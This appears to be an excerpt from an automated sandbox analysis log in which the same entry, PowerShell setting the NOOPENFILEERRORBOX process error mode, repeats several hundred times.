          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
